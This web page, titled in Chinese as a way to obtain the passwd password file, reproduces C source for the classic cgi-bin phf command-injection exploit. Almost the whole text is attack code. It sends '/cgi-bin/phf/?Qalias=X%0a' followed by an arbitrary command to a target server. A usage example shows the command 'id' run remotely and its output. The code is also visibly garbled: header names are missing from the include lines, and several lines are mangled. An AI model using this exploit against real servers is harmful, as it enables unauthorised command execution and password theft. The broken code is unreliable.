如何获取passwd密码档yu phf.c ------ cut here---- /* Some small changes for efficiency by snocrash. */ /* * cgi-bin phf exploit by loxsmith [xf] * * I wrote this in C because not every system is going to have lynx. Also, * this saves the time it usually takes to remember the syntatical format * of the exploit. Because of the host lookup mess, this will take * approximately 12 seconds to execute with average network load. Be patient. * */ #include #include #include #include #include #include #include int main(argc, argv) int argc; char **argv; { int i = 0, s, port, bytes = 128; char exploit[0xff], buffer[128], hostname[256], *command, j[2]; struct sockaddr_in sin; struct hostent *he; if (argc != 3 && argc != 4) { fprintf(stderr, "Usage: %s command hostname [port]", argv[0]); exit(1); } command = (char *)malloc(strlen(argv[1]) * 2); while (argv[1] != '') { if (argv[1] == 32) strcat(command, "%20"; else { sprintf(j, "%c", argv[1]); strcat(command, j); } ++i; } strcpy(hostname, argv[2]); if (argc == 4) port = atoi(argv[3]); else port = 80; if (sin.sin_addr.s_addr = inet_addr(hostname) == -1) { he = gethostbyname(hostname); if (he) { sin.sin_family = he->h_addrtype; memcpy((caddr_t) &sin.sin_addr, he->h_addr_list[0], he->h_length); } else { fprintf(stderr, "%s: unknown host %s ", argv[0], hostname); exit(1); } } sin.sin_family = AF_INET; sin.sin_port = htons((u_short) port); if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) { fprintf(stderr, "%s: could not get socket ", argv[0]); exit(1); } if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { close(s); fprintf(stderr, "%s: could not establish connection ", argv[0]); exit(1); } sprintf(exploit, "GET /cgi-bin/phf/?Qalias=X%%0a%s ", command); free(command); write(s, exploit, strlen(exploit)); while(bytes == 128) { bytes = read(s, buffer, 128); fprintf(stdout, buffer); } close(s); } -------- cut here 使用举例： bash% phf id xxx.org ------

Query Results

/usr/local/bin/ph -m alias=X id

 
uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)